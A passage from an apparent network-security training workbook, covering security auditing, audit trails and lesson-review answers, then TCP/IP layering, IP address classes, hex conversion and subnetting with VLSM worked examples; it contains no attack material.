Answers may vary, but may include: Improper conguration of a rewall,
NAT, or proxy can result in authorized users not being able to access
resources they need to access or vice versa; users may not fully understand
the modern key management process used in encryption systems, therefore,
unless encryption is an integrated feature of the operating system, IP stack,
or application, users may be inconvenienced; the user logon and verication
process can also inconvenience users if it is too complicated.
2. How could adding additional layers of defense cause problems for the
packet ow on the network?
Answers may vary, but could include: Strong encryption can increase the
actual network traffc; more CPU cycles are required to generate encrypted
traffc and decipher them upon receipt; IDS systems running in a very para-
noid mode may create excessive auditing and alerts, sometimes resulting in
false alerts.
Topic 1E
Network Auditing Concepts
Auditing entails the recording, maintenance, and protection from unauthorized
access, modication, or deletion of detailed access event logs of information tech-
nology assets and network systems to ensure compliance with an established
security policy. Auditing within a network systems environment involves much
more than the typical recording of system activity.
Security Auditing Basics
It would be useless to put a lock on a door if it was never checked to see if it
was still locked or if it was unlocked, when it was unlocked, and by whom. In
checking the security of a network, answers to the following questions need to be
recorded and logged for use later in case of system compromise:
What was checked?
Who did the checking?
When was it checked?
How was it checked?
Were there any ndings?
compromise:
An intrusion into a computer
system where unauthorized
disclosure, modication, or
destruction of sensitive
information may have
occurred.
Lesson 1: Network Defense Fundamentals 23
Besides the usual recording of logins, logouts, accessing les, directories and
resources, and security violations, additional network security events must be
audited on both sides of the network connection. Both sides means any establish-
ing or dropping of network connections with other networks must be logged, as
well as any failed network components and any misrouted or lost data while in
transit. Auditing should capture the information of the following events:
All access events with use of identication and authentication mechanisms.
Any deletion of les, data, or information.
Modication of directories.
Movement of large data assets into users address space.
Any security actions or other security-related events.
Each event should contain the following entries in the audit log:
Date and time of the event.
Name of user creating the event, as well as event origin.
Event description and type.
Name of asset in case of deletion.
Event success or failure.
Security Audits
Logged records of monitored events are kept on hand for auditing purposes.
Although they can be conducted by either internal or external resources, the two
typical types of security audits are operational or independent.
Operational Audit
This type of audit is usually done by internal resources to examine the opera-
tional and ongoing activities within a network system for compliance with an
established security policy.
Independent Audit
An independent audit is usually conducted by external or outside resources and
may be a review or audit of detailed audit logs to:
Examine system activities and access logs.
Assess the adequacy of security methods and controls.
Assess compliance with established enterprise network system policies and
procedures.
Assess effectiveness of support, enabling, and core processes.
Recommend improvements in security processes, methods, and controls.
security violation:
An instance in which a user
or other person circumvents
or defeats the controls of a
system to obtain
unauthorized access to
information contained therein
or to the system itself.
audit:
The independent examination
of records and activities to
ensure compliance with
established controls, policy,
and operational procedures,
and to recommend any
indicated changes in
controls, policy, or
procedures.
security audit:
A search through a computer
system for security problems
and vulnerabilities.
24 Tactical Perimeter Defense
Whether an audit is done as an operational or independent audit, a thorough
search through the system should be conducted to detect any aws, vulnerabili-
ties, or problems. An IDS can provide network system vulnerabilities, but a
security audit should be conducted to nd problems within the le systems on the
network. Out of this audit should come detailed reports that may give you some
clues as to possible existing or future problems. These may include:
Accounts with no name or expired names of people that have left the com-
pany or group.
New accounts needing validation for authorized users.
Group accounts needing access control specics to pinpoint who had access
at what time and not just a group name logon.
Recent changes to le protection or changes in rights to large les.
Accounts with easily guessed passwords.
Accounts with expired or no passwords.
Any other suspicious user activity.
Audit Trails
Network auditing still needs to log the audit trail or history of any network
transaction. The requirement for any audit trail is that documentation be kept to
record the historical use of the network system. But the primary purpose of a
recorded audit trail is to be able to examine the detailed historical record of sys-
tem use in order to replicate specic event scenarios after a compromise or
exploit has occurred. An audit trail is the only way to examine the sequence of
events that led up to the systems compromise or exploitation. Without an audit
trail, there would be no way to nd out how a compromise or exploit of the sys-
tem occurred, or when it actually happened.
Handling and Preserving Audit Data
Audit data should be some of the most carefully secured data at the site and in
the backups. If an intruder were to gain access to audit logs, the systems them-
selves would be at risk, in addition to the data.
Audit data may also become key to the investigation, apprehension, and prosecu-
tion of the perpetrator of an incident. For this reason, it is advisable to seek the
advice of legal counsel when deciding how audit data should be handled. This
should happen before an incident occurs.
If a data-handling plan is not adequately dened prior to an incident, it could
mean that there is no recourse in the aftermath of an event, and it may create
liability resulting from improper treatment of the data.
Legal Considerations
Due to the content of audit data, there are a number of legal questions that arise
which might need to be addressed by your legal counsel. If you collect and save
audit data, you need to be prepared for consequences resulting both from its con-
tent as well as its existence.
audit trail:
In computer security
systems, a chronological
record of system resource
usage. This includes user
login, le access, other
various activities, and
whether any actual or
attempted security violations
occurred.
perpetrator:
The entity from the external
environment that is taken to
be the cause of a risk. An
entity in the external
environment that performs an
attack, i.e. hacker.
Lesson 1: Network Defense Fundamentals 25
One area concerns the privacy of individuals. In certain instances, audit data may
contain personal information. Searching through the data, even for a routine
check of the systems security, could represent an invasion of privacy.
A second area of concern involves knowledge of intrusive behavior originating
from your site. If an organization keeps audit data, is it responsible for examining
it to search for incidents? If a host in one organization is used as a launching
point for an attack against another organization, can the second organization use
the audit data of the rst organization to prove negligence on the part of that
organization?
These examples are not meant to be comprehensive, but should motivate your
organization to consider the legal issues involved with audit data.
TASK 1E-1
Describing Network Auditing
1. What are the benets of auditing network traffic?
Logs of audited network traffc can be used to examine a detailed historical
record of network and system use in order to reconstruct specic event sce-
narios after a compromise or exploit has occurred.
2. What is a possible drawback to network auditing?
If an intruder were to gain access to audit logs, the systems themselves
would be at risk, in addition to the data.
3. Why is the handling and storage of audit data so critical?
Audit data may contain personal information. Searching through the data,
even for a routine check of the systems security, could represent an invasion
of privacy.
Apart from that, the very knowledge of intrusive behavior originating from
your site raises the question of responsibility with regard to reporting the
incident to a third party or maybe even an authority such as the FBI.
Summary
In this lesson, you walked through the process of creating a layered defense.
You are able to identify why the layered defense is important and the tech-
nologies used to create one. You also examined the concepts of network
auditing, including handling of data and types of audits. You have dened
the ve keys of network defense, described the objectives of access control
methods, and identied the impact of defense on the network.
26 Tactical Perimeter Defense
Lesson Review
1A What do authentication and availability create in the network?
Authentication and availability in a network create system assurance.
Describe the differences between one-, two-, and three-factor
authentication.
One-factor authentication provides what you know, such as a password or
PIN. Two-factor authentication is providing what you have, like a smart
card or a token in addition to what you know. The third factor which pro-
vides strong authentication is proving a users identity, or who you are,
by using biometrics. Biometrics uses a physiological characteristic to iden-
tify you, such as a ngerprint, retina scan, hand geometry, voice recognition,
iris scan, or behavioral characteristics such as keystroke recognition or sig-
nature recognition.
Is it possible to have data condentiality without having data integrity?
No, however, it is possible to have data integrity without data condentiality.
What is the difference between a passive threat and an active threat?
Simply put, in a passive threat, data is viewed, but in an active threat, data
is modied.
1B What are the primary technologies used to create a layered defense?
A security policy implemented at various layers of the network.
Perimeter defenses, such as routers, rewalls, NAT, and proxies.
Intrusion Detection Systems (IDS) can be put in place to monitor net-
work traffc or hosts.
Authentication has to be regularized using one-, two-, or three-factor
authentication methods depending upon the requirement (machine-
specic authentication may be required in some cases).
File System Security should be in place once a user is logged in, to
allow or deny access to resources.
Physical access/security to the network or individual machines should
be addressed.
What could be the result of skipping a layer of defense?
Security policy: Unstructured defense.
Perimeter defense: Intruders will come in.
IDS: You wont know that intruders have come in.
Authentication: Anyone can log in to your network.
File System Security: Anyone who has access to a machine can access
everything on that machine.
Physical security: Anyone can access any machine.
Lesson 1: Network Defense Fundamentals 27
1C Name and describe the two methods of Access Control.
Mandatory Access Control, where subjects and objects are Classied,
Secret, or Top Secret.
Discretionary Access Control, where a users identity is used in rst
determining certain user rights into the system, and then at each
resource to see if the user has Create, Read, Update, or Delete (CRUD)
privileges.
Describe the process of authentication.
Authentication is the process of determining the identity of a user who is
attempting to access a system. A user provides the requested information to
an authentication verication authority. The authentication verication
authority uses this information, or a derivative of it, against a pre-congured
database. If the values match, the user is issued appropriate credentials to
access the system. The user then presents these credentials to access
resources.
What are software tokens, and how can an organization benet by using
them?
A software token is an authentication technique using a portable device,
such as a Palm Pilot or Palm PC. Since the token is generated via software,
an organization does not have to be tied down to a particular hardware
token generator. When circumstances change and they have to upgrade the
strength of the token, for example, they just need to upgrade the software in
the portable device rather than recall and reissue hardware devices.
1D How could a rewall have a negative impact on network performance?
A rewall can have a negative impact on the network by blocking access to
resources that should be accessible. It is possible that, because of improper
conguration of a rewall, entire portions of a network become unavailable.
Additionally, if an ordinary PC has been congured to be the rewall (a
multihomed computer) it may not have the internal speed to perform all the
functions of a rewall fast enough, resulting in latency.
How can encryption affect network performance?
If the data packets are encrypted, the information that must be transmitted is
larger, and therefore more bandwidth will be consumed.
How can encryption affect individual hosts?
The devices that perform encryption and decryption have more work to do in
running the algorithms that perform the task.
1E What are two of the events that can be captured with auditing?
Answers may include the following: All access events with use of identica-
tion and authentication mechanisms; any deletion of les, data, or
information; modication of directories; movement of large data assets into
users address space; any security actions or other security-related events.
28 Tactical Perimeter Defense
What are two of the entries that should be captured in an event?
Answers may include the following: Date and time of the event; name of
user creating the event as well as event origin; event description and type;
name of asset in case of deletion; event successful or failed.
What are the two typical types of security audits?
Operational and independent.
Lesson 1: Network Defense Fundamentals 29
30 Tactical Perimeter Defense
Advanced TCP/IP
Overview
There is one primary set of protocols that runs networks and the Internet
today. In this lesson, you will work with those protocols: the Transmission
Control Protocol (TCP) and the Internet Protocol (IP). In order to manage
the security of a network, you must become familiar with the details of how
TCP/IP functions, including core concepts, such as addressing and
subnetting, and advanced concepts, such as session establishment and packet
analysis.
Objectives
To better understand advanced TCP/IP concepts, you will:
2A Dene the core concepts of TCP/IP.
Given a machine running TCP/IP, you will dene the core concepts of
TCP/IP, including the layering models, RFCs, addressing and subnetting,
VLSM and CIDR, and the TCP/IP suite.
2B Analyze sessions of TCP.
Given a Windows Server 2003 computer, you will examine control ags,
sequence numbers, and acknowledgement numbers, and you will use Net-
work Monitor to view and analyze all of the elds of the three-way
handshake and session teardowns.
2C Analyze IP.
Given a Windows Server 2003 computer, you will use Network Monitor
to view and analyze all the elds of IP.
2D Analyze ICMP.
Given a Windows Server 2003 computer, you will use Network Monitor
to view and analyze all the elds of ICMP.
2E Analyze TCP.
Given a Windows Server 2003 computer, you will use Network Monitor
to view and analyze all the elds of TCP.
2F Analyze UDP.
Given a Windows Server 2003 computer, you will use Network Monitor
to view and analyze all the elds of UDP.
Data Files
tftp.cap
fragment.cap
ping.txt
ping.cap
ftp.txt
ftp.cap
WinPcap
Wireshark
Lesson Time
6 hours
LESSON
2
Lesson 2: Advanced TCP/IP 31
2G Analyze fragmentation.
Given a Windows Server 2003 computer, you will use Network Monitor
to view and analyze network traffic fragmentation.
2H Complete a full session analysis.
Given a Windows Server 2003 computer, you will use Network Monitor
to view and analyze a complete FTP session, frame by frame.
32 Tactical Perimeter Defense
Topic 2A
TCP/IP Concepts
In order for two hosts to communicate, there must rst be an agreed-upon method
of communication for both hosts to use. The protocol that the Internet was built
on, and the protocol that all hosts on the Internet use is TCP/IP, or Transmission
Control Protocol/Internet Protocol. Because the two hosts agree on the protocol
they will use, we can go right into the details of the protocol itself.
The TCP/IP Model
In order for data to move from one host to another, it must be transmitted and
received. There are several ways this could happen, in theory.
The data le could be sent as a whole le, intact, from one host to another.
The data le could be split in half and sent, sending and receiving two equal
sized pieces.
The data le could be split into many smaller pieces, all sent and received in
a specic sequence.
It is this last method that is actually used. For example, if a user is at a host and
wants to view a web page on a different host, the request and subsequent
response will take many small steps to complete. In Figure 2-1, you can see the
four layers of the TCP/IP Model, along with the browsers request for a web page
going to the web server.
Figure 2-1: A web request moving along the TCP/IP Model.
The four layers of the TCP/IP Model are:
The Application Layer
The Transport Layer
The Internet Layer (also called the Network Layer)
The Network Access Layer (also called the Link Layer)
Many of the Concepts in
this topic were covered in
the prerequisite courses,
but are provided here for
review.
host:
A single computer or
workstation; it can be
connected to a network.
server:
A system that provides
network service such as disk
storage and le transfer, or a
program that provides such a
service. A kind of daemon
that performs a service for
the requester, which often
runs on a computer other
than the client machine.
Lesson 2: Advanced TCP/IP 33
The reason that there are alternate names for these layers is that there has never
been an agreed-upon standard for the names to which the industry agrees. Each
of these layers are detailed as follows:
The Application Layer is the highest layer in the model, and communicates
with the software that requires the network. In our example, the software is
the web page request from a browser.
The Transport Layer is where the reliability of the communication is dealt
with. There are two protocols that work at this layer, TCP (Transmission
Control Protocol) and UDP (User Datagram Protocol). An immediate differ-
ence between the two is that TCP does provide for reliable delivery of data,
whereas UDP provides no such guarantee.
The Internet Layer (or Network Layer) provides the mechanism required to
address and move the data from one host to the other. The primary protocol
you will examine at this layer is IP (Internet Protocol).
The Network Access Layer (or Link Layer) is where the data communication
interacts with the physical medium of the network. This is the layer that
does the actual sending and receiving of the data.
As you saw in Figure 2-1, as the web page request was initiated on the host, it
moved down the layers, was transmitted across the network, and moved up the
layers on the web server. These are the layers on which all network communica-
tion using TCP/IP is based. There is a different set of layers, however, called the
OSI Model.
The OSI Model
The TCP/IP Model works well for TCP/IP communications, but there are many
protocols and methods of communication other than TCP/IP. A standard was
needed to encompass all of the communication protocols. The standard developed
by the International Organization for Standardization (ISO) is called the OSI
Model.
The Open Systems Interconnect (OSI) Model has seven layers, compared to the
four layers of the TCP/IP Model. The seven layers of the OSI Model are:
The Application Layer
The Presentation Layer
The Session Layer
The Transport Layer
The Network Layer
The Data Link Layer
The Physical Layer
network:
Two or more machines
interconnected for
communications.
OSI:
(Open Systems
Interconnection) A set of
internationally accepted and
openly developed standards
that meet the needs of
network resource
administration and integrated
network components.
34 Tactical Perimeter Defense
The names of these layers are xed, as this is an agreed upon standard. The
details of each layer are as follows:
The Application Layer is the highest layer of the OSI Model, and deals with
interaction between the software and the network.
The Presentation Layer is responsible for data services such as data compres-
sion and data encryption/decryption.
The Session Layer is responsible for establishing, managing (such as packet
size), and ending a session between two hosts.
The Transport Layer is responsible for error control and data recovery
between two hosts. Both TCP and UDP work at this layer.
The Network Layer is responsible for logical addressing, routing, and for-
warding of datagrams. IP works at this layer.
The Data Link Layer is responsible for packaging data frames for transmis-
sion on the physical medium. Error control is added at this layer, often in
the form of a Cyclic Redundancy Check (CRC). This layer is subdivided
into the LLC (Logical Link Control) and MAC (Media Access Control)
sublayers. The MAC sublayer is associated with the physical address of the
network device and the LLC sublayer makes the association between this
physical address (such as the 48-bit MAC address if using Ethernet) and the
logical address (such as the 32-bit IP address if using IP) at the Network
Layer.
The Physical Layer is responsible for the actual transmission and receipt of
the data bit stream on the physical medium.
The OSI Model and the TCP/IP Model do t together. In Figure 2-2, you can see
that the two primary layers of concern in the TCP/IP Model (the Transport and
Internet Layers), match directly with the Transport and Network Layers of the
OSI Model, while the other two TCP/IP Model layers encompass two or more
layers of the OSI Model.
Figure 2-2: A comparison of the OSI and TCP/IP Models.
As the data from one host ows down the layers of the model, each layer
attaches a small piece of information relevant to that layer. This attachment is
called the header. For example, the Network Layer header will identify the logical
addresses (such as IP addresses) used for this transmission. This process of add-
ing a header at each layer is called encapsulating. Figure 2-3 shows a visual
representation of the header and the encapsulation process.
packet:
A block of data sent over the
network transmitting the
identities of the sending and
receiving stations, error-
control information, and
message.
Lesson 2: Advanced TCP/IP 35
Figure 2-3: Headers and the encapsulation process as data moves down the stack.
When the second host receives the data, and as the data moves up the layers,
each header will let the host know how to handle this piece of data. After all the
headers have been removed, the receiving host is left with the data as it was sent.
RFCs
With all the standards dened in the previous section, you may be asking where
to go to nd the standards. The answer is to the RFCs. A Request For Comments
(RFC) is the industry location for standards relating to TCP/IP and the Internet.
RFCs are freely available documents to read and study, and if you ever want to
go directly to the source, be sure to use the RFC.
Although you will nd RFCs listed all over the Internet, to view them all online
go to: www.rfc-editor.org. This is the website with a searchable index of all
RFCs. There are several RFCs you should be familiar with, and that you should
know by name to look up. This way you will not have to search hundreds of
responses to nd what you need. The RFCs you should know are:
The Internet Protocol (IP): RFC 791.
The Internet Control Messaging Protocol (ICMP): RFC 792.
The Transmission Control Protocol (TCP): RFC 793.
The User Datagram Protocol (UDP): RFC 768.
The Function of IP
The Internet Protocol (which works at the Network layer of both the OSI and the
TCP/IP models), by denition, has a simple function. IP identies the current
hostvia an addressand using addressing, moves a packet of information from
one host to another. Each host on the network has a unique IP address, and each
packet the host sends will contain its own IP address and the IP address to which
the packet is destined.
The packets are then directed, or routed, across the network, using the destination
address, until they reach their nal destination. The receiving host can read the IP
address of the sender and send a response, if required.
36 Tactical Perimeter Defense
Although it sounds straightforward, and does work, there are drawbacks. For
instance, when packets are sent from one host to another, they may be received
out of order. IP has no mechanism for dealing with that problem. Also, packets
can get lost or corrupted during transmission, again a problem IP does not
manage. These problems are left to an upper protocol to manage. Often that pro-
tocol will be TCP, as you will see in the following topic.
Binary, Decimal, and Hexadecimal Conversions
Even though you may be familiar with the concept of binary math, you may wish
to review this section briey. In binary, each bit has the ability to be either a 1 or
a 0. In computers, these bits are stored in groups of 8. Since each bit can be
either a 1 or a 0, each location is designated a power of 2. A byte, therefore, has
binary values from 2
0
through 2
7
. In Figure 2-4, you can see the value of each
of the 8 bits in a byte.
When the bits are presented as a byte, the value of each of the 8 locations is
added to present you with the decimal equivalent. For example, if all 8 bits were
1s, such as 11111111, then the decimal value would be 255 or
128+64+32+16+8+4+2+1. Here are a few other quick binary to decimal conver-
sions:
Binary 11000000 is decimal 192 or 128+64+0+0+0+0+0+0
Binary 10000000 is decimal 128 or 128+0+0+0+0+0+0+0
Binary 10000010 is decimal 130 or 128+0+0+0+0+0+2+0
Binary 01011010 is decimal 90 or 0+64+0+16+8+0+2+0
The IP addresses that are either manually or dynamically assigned to a host are
32-bit elds, often shown as four decimal values for ease of reading. For
example, a common address would be 192.168.10.1. Each number is an 8-bit
binary value, or an octet. In this example, the rst octet is 192, the second 168,
the third 10, and the fourth 1.
Even though the fourth octet is given a decimal value of 1, it is still given an
8-bit value in IP addressing. Each bit of the 32-bit address must be represented,
so the computer sees a decimal 1 in an IP address as 00000001. Keeping this in
mind, the full decimal IP address of 192.168.10.1 is seen to the computer as
binary IP address: 11000000.10101000.00001010.00000001
In tools that are designed to capture and analyze network traffic, the IP address is
often represented in its hexadecimal (Hex) format. The ability to view and recog-
nize addressing in Hex format is a useful skill to have when you are working
with TCP/IP. In hexadecimal format, the IP address 192.168.10.1 is C0-A8-0A-
01. The following is a quick summary on Hex conversions.
Lesson 2: Advanced TCP/IP 37
To convert the decimal address 192.168.10.1 to hexadecimal, convert each of its
octets, then combine the results, as follows:
1. Divide 192 by 16. The result is 12, with a remainder of 0. Because decimal
12 is the same as Hex C and decimal 0 is the same as Hex 0, decimal 192 is
equal to Hex C0.
2. Divide 168 by 16. The result is 10, with a remainder of 8. Because decimal
10 is the same as Hex A and decimal 8 is the same as Hex 8, decimal 168 is
equal to Hex A8.
3. Decimal 10 is the same as Hex A.
4. Decimal 1 is the same as Hex 1.
5. Combining the results of each conversion shows that decimal 192.168.10.1 is
equal to Hex C0A80A01.
Another way to derive this result is to rst convert from decimal to binary, then
convert binary to hexadecimal four bits at a time, and nally, combine the results,
as shown here:
1. Decimal 192 is the same as binary 11000000.
2. Decimal 168 is the same as binary 10101000.
3. Decimal 10 is the same as binary 00001010.
4. Decimal 1 is the same as binary 00000001.
5. Binary 1100 (the rst four bits of the rst octet) is the same as Hex C.
6. Binary 0000 is the same as Hex 0.
7. Binary 1010 is the same as Hex A.
8. Binary 1000 is the same as Hex 8.
9. Binary 0000 is the same as Hex 0.
10. Binary 1010 is the same as Hex A.
11. Binary 0000 is the same as Hex 0.
12. Binary 0001 is the same as Hex 1.
13. Combining the Hex equivalents shows that decimal 192.168.10.1 is equal to
Hex C0A80A01.
IP Address Classes
There are ve dened classes of IP addresses: Class A, Class B, Class C, Class
D, and Class E. The details of each class are as follows:
Class A IP addresses use the rst 8 bits of an IP address to dene the net-
work, and the remaining 24 bits to dene the host. This means there can be
more than 16 million hosts in each Class A network (2
24
2, because all 1s
and all 0s cannot be used as host addresses). All Class A IP addresses will
have a rst octet of 0xxxxxxx in binary format. 10.10.10.10 is an example
of a Class A IP address.
Class B IP addresses use the rst 16 bits to dene the network, and the
remaining 16 bits to dene the host. This means there can be more than
65,000 hosts in each Class B network (2
16
2). All Class B IP addresses will
have a rst octet of 10xxxxxx in binary format. 172.16.31.200 is an example
of a Class B IP address.
Class C IP addresses use the rst 24 bits to dene the network, and the
remaining 8 bits to dene the host. This means there can be only 254 hosts
38 Tactical Perimeter Defense
in each Class C network (2
8
2). All Class C IP addresses will have a rst
octet of 110xxxxx in binary format. 192.168.10.1 is an example of a Class C
IP address.
Class D IP addressing is not used for hosts, but is often used for
multicasting (which will be discussed later), where there is more than one
recipient. The rst-octet binary value of a Class D IP address is 1110xxxx.
224.0.0.9 is an example of a Class D IP address.
Class E IP addressing is used for experimental functions and for future use.
It does have a dened rst-octet binary value as well. All Class E IP
addresses have a rst octet binary value of 11110xxx. 241.1.2.3 is an
example of a Class E IP address.
Figure 2-4: IP address classes and their rst-octet values.
Private IP Addresses and Special-function IP Addresses
There are several ranges of IP addresses that are not used on the Internet. These
addresses are known as private, or reserved, IP addresses. Dened in RFC 1918,
any host on any network can use these addresses, but these addresses are not
meant to be used on the Internet, and most routers will not forward them. By
using these reserved IP addresses, organizations do not have to be as concerned
with address conicts. The dened private addresses for the three main address
classes (A, B, and C) are:
Class A: 10.0.0.0 to 10.255.255.255
Class B: 172.16.0.0 to 172.31.255.255
Class C: 192.168.0.0 to 192.168.255.255
In addition to the private address ranges listed, there are a few other address
ranges that have other functions. The rst, is the range of 127.0.0.0 to 127.255.
255.255. This address range is used for diagnostic purposes, with the common
address of 127.0.0.1 used to identify IP on the host itself. The second range is
169.254.0.0 to 169.254.255.255. This address range is used by Microsoft to allo-
cate addresses to hosts, for Automatic Private IP Addressing (APIPA).
Lesson 2: Advanced TCP/IP 39
The Subnet Mask
Along with an IP address, each host that uses TCP/IP has a subnet mask. The
subnet mask is used during a process called ANDing to determine the network to
which the host belongs. The way the mask identies the network is by the num-
ber of bits allocated, or masked, for the network. A bit that is masked is identied
with a binary value of 1.
By default, a Class A IP address has 8 bits masked to identify the network, a
Class B IP address has 16 bits masked to identify the network, and a Class C IP
address has 24 bits masked to identify the network. These default subnet masks
use contiguous bits to create the full mask. The following table shows the default
subnet masks for the three classes, rst in binary, then in the more traditional dot-
ted decimal format.
Default Subnet Masks
Class Binary Format Dotted Decimal Format
A 11111111.00000000.00000000.00000000 255.0.0.0
B 11111111.11111111.00000000.00000000 255.255.0.0
C 11111111.11111111.11111111.00000000 255.255.255.0
The subnet mask can be represented in different formats. For example, one com-
mon format is to list the IP address followed by the full subnet mask, such as
this: 192.168.10.1 255.255.255.0. Another option, and one that is easier to write,
is to count and record the number of bits that are used as 1s in the subnet mask.
For example, in the default subnet mask for Class C, there are 24 bits designated
as 1. So, to use the second format, list the IP address followed by a slash and the
number of bits masked, such as this: 192.168.10.1/24.
Subnetting Example
In the event that you need to split a network into more than one range, such as
having different buildings or oors, you will need to subdivide the network. The
following example will step you through the process of splitting a network and
creating the subnet mask necessary to support the resulting subnetworks.
Lets say you have been assigned the 10.0.0.0 network with the 255.0.0.0 subnet
mask, and need to break this up into 12 network ranges to support, for example,
the 12 major departments in your corporate building. Heres what you should do:
1. Determine how many bits, in binary, it takes to make up the number of sub-
networks you need to create. In binary, 12 is 1100, so you will need 4 bits.
2. Take 4 bits from the host side of the subnet mask and, AND them to the
network side, effectively changing your subnet mask from 255.0.0.0 to 255.
240.0.0.
As you know, the subnet mask tells you where the dividing line
between network and host bits reside. You started with a network ID of
10.0.0.0 and subnet mask of 255.0.0.0, which in binary looks like this:
00001010.00000000.00000000.00000000 (IP address for network)
11111111.00000000.00000000.00000000 (subnet mask)
Your dividing line is at the end of the rst octet (eight bits starting from
the left). You have one big network with a network ID of 10.0.0.0, a
40 Tactical Perimeter Defense
range of usable addresses from: 10.0.0.1 to 10.255.255.254, and a
broadcast address of 10.255.255.255.
The new, divided network looks like this:
00001010.0000 0000.00000000.00000000 (IP address for network)
11111111.1111 0000.00000000.00000000 (subnet mask)
Notice that the network/host dividing line is now in the middle of the
second octet. All of your networks will have binary addresses that will
look like this: 00001010.xxxx yyyy.yyyyyyyy.yyyyyyyy, where x repre-
sents one of the variable bits used to create your subnetworks and y
represents a bit on the host side of the address.
3. Determine the subnetwork addresses by changing the value of the x bits. The
rst possible permutation is the 00001010.0000 network; the second is the
00001010.0001 network, and so forth. The following table lists all of the
possible subnetwork addresses (notice the pattern?).
Subnetwork Binary Address Decimal Address
First 00001010.0000 0000.00000000.00000000 10.0.0.0
Second 00001010.0001 0000.00000000.00000000 10.16.0.0
Third 00001010.0010 0000.00000000.00000000 10.32.0.0
Fourth 00001010.0011 0000.00000000.00000000 10.48.0.0
Fifth 00001010.0100 0000.00000000.00000000 10.64.0.0
Sixth 00001010.0101 0000.00000000.00000000 10.80.0.0
Seventh 00001010.0110 0000.00000000.00000000 10.96.0.0
Eighth 00001010.0111 0000.00000000.00000000 10.112.0.0
Ninth 00001010.1000 0000.00000000.00000000 10.128.0.0
Tenth 00001010.1001 0000.00000000.00000000 10.144.0.0
Eleventh 00001010.1010 0000.00000000.00000000 10.160.0.0
Twelfth 00001010.1011 0000.00000000.00000000 10.176.0.0
Thirteenth 00001010.1100 0000.00000000.00000000 10.192.0.0
Fourteenth 00001010.1101 0000.00000000.00000000 10.208.0.0
Fifteenth 00001010.1110 0000.00000000.00000000 10.224.0.0
Sixteenth 00001010.1111 0000.00000000.00000000 10.240.0.0
For the rst network, the network ID is 10.0.0.0 with a subnet mask of 255.240.
0.0. The rst usable address is 10.0.0.1, and the last usable address is 10.15.255.
254. The broadcast address is 10.15.255.255 (the next possible IP address would
be 10.16.0.0, which is the network ID of the second network). The second net-
work has an ID of 10.16.0.0, a usable range of 10.16.0.1 to 10.16.255.254, and a
broadcast address of 10.16.255.255.
Notice that you needed only 12 networks, but you have 16. That can happen,
depending on the number of networks needed. For example, if you had needed 20
networks, you would have needed to move the network/host dividing line over 5
bits to the right (20 in binary is 10100, so 5 bits must be used). In that case, you
would have had a subnet mask of 255.248.0.0 (instead of the 255.240.0.0 that
you used for the rst example), which would have given you 32 subnetworks,
even though you needed only 20. Consider it room for corporate growth!
Lesson 2: Advanced TCP/IP 41
Note that any combination of addressing can be represented in different text. For
example, you may come across a resource that denes the IP address in decimal,
and the subnet mask in hexadecimal. You must be able to quickly recognize the
addressing as dened. Use the following task to test your ability to quickly per-
form these conversions.
TASK 2A-1
Layering and Address Conversions
1. Describe how layering is benecial to the function of networking.
By using a layered model, network communications can be broken into
smaller chunks. These smaller chunks can each have a specic purpose, or
function, and in the event an error happens in one chunk, it is possible that
only that error be addressed, instead of starting over from scratch.
2. If you have an IP address of 192.168.10.1 and a subnet mask of FF-FF-
00-00, to which IP network does your computer belong? Provide both
decimal and Hex notations.
In decimal, the network address is 192.168.0.0; in Hex, the network address
is C0-A8-00-00.
3. If you have an IP address of C0-A8-0A-01 and a subnet mask of /16, to
which IP network does your computer belong? Provide both decimal
and Hex notations.
In decimal, the network address is 192.168.0.0; in Hex the network address
is C0-A8-00-00.
Routing
You will get into routing in more detail later, but at this stage, you will address
the basics. Being familiar with a network and how one host will communicate
with another host within the same network, what do you think will happen if a
host needs to send information to a host that is not in its network?
This is exactly the situation where routing is needed. You need to route that infor-
mation from your network to the receiving hosts network. Of course, the device
that makes this possible is the router. The rst router you will encounter on your
way out of your network is the default gateway. This is the device that your com-
puter will send all traffic to, once it determines that the destination host is not
local (on the same network as itself). After the default gateway gets a packet of
information destined for host User1 on network X, it looks at its routing table
(think of this as a sort of directorytelling the router that traffic destined for net-
works C, G, F, and X should go out interface 1, traffic destined for networks E,
A, B, and R should go out interface 2, and so forth), then the router forwards the
packet out through interface 1. The destination network may or may not be
attached to interface 1the router doesnt really care at this pointit just for-
wards the packet on according to the information in its routing table. This process
router:
An interconnection device
that is similar to a bridge but
serves packets or frames
containing certain protocols.
Routers link LANs at the
Network Layer.
42 Tactical Perimeter Defense
repeats from one router to the next until the packet nally reaches the router that
is attached to the same network as the destination host. When the packet reaches
this router, which is usually also the destination hosts default gateway, it is sent
out on the network as a unicast directed to the destination host User1.
VLSM and CIDR
The standard methods of subnet masking discussed earlier are effective; however,
there are instances where further subdividing is required, or more control of the
addressing of the network is desired. In these cases, you can use either of the
following two options: Variable Length Subnet Masking (VLSM) or Classless
Interdomain Routing (CIDR).
Think back to the previous example of subnet masking. In particular, lets take a
closer look at the fourth network. It was intended to be used by the IT staff; how-
ever, they want to break the rather large network block given to them into
smaller, more manageable blocks. Specically, they need ve smaller subnet-
works to be created from their network block of 10.48.0.0 with a subnet mask of
255.240.0.0.
This time, lets represent the IP addresses and subnet masks using the slash
method: 10.48.0.0/12. Notice the IP address stays the same, but we replace the
subnet mask with /12 to tell others that the subnet mask has 12 1s in it (which, of
course, corresponds to 255.240.0.0).
Now, back to the IT staffs networking issue. You have an already subnetted net-
work (10.48.0.0/12) that you would like to split into ve smaller networks. To
begin, you need to ask the same starting question: How many bits does it take to
make 5? In binary, 5 is 101, so you will need three bits. Then, add three bits to
the present subnet mask (dont worry that it has already been subnetted before
that doesnt matter). So, now you have 10.48.0.0/15 as your rst network address
and new subnet mask.
The new variable range is 00001010.0011xxx y.yyyyyyyy.yyyyyyyy, where the
binary numbers will not change, x represents the variable bits that will make up
the networks, and y designates the host bits.
So, what are the new network addresses?
Subnetwork Binary Address Decimal Address
First 00001010.0011000 0.00000000.00000000 10.48.0.0
Second 00001010.0011001 0.00000000.00000000 10.50.0.0
Third 00001010.0011010 0.00000000.00000000 10.52.0.0
Fourth 00001010.0011011 0.00000000.00000000 10.54.0.0
Fifth 00001010.0011100 0.00000000.00000000 10.56.0.0
Sixth 00001010.0011101 0.00000000.00000000 10.58.0.0
Seventh 00001010.0011110 0.00000000.00000000 10.60.0.0
Eighth 00001010.0011111 0.00000000.00000000 10.62.0.0
Lesson 2: Advanced TCP/IP 43
For the rst network, the network ID is 10.48.0.0, the usable addresses are 10.48.
0.1 to 10.49.255.254, and the broadcast address is 10.49.255.255; for the second,
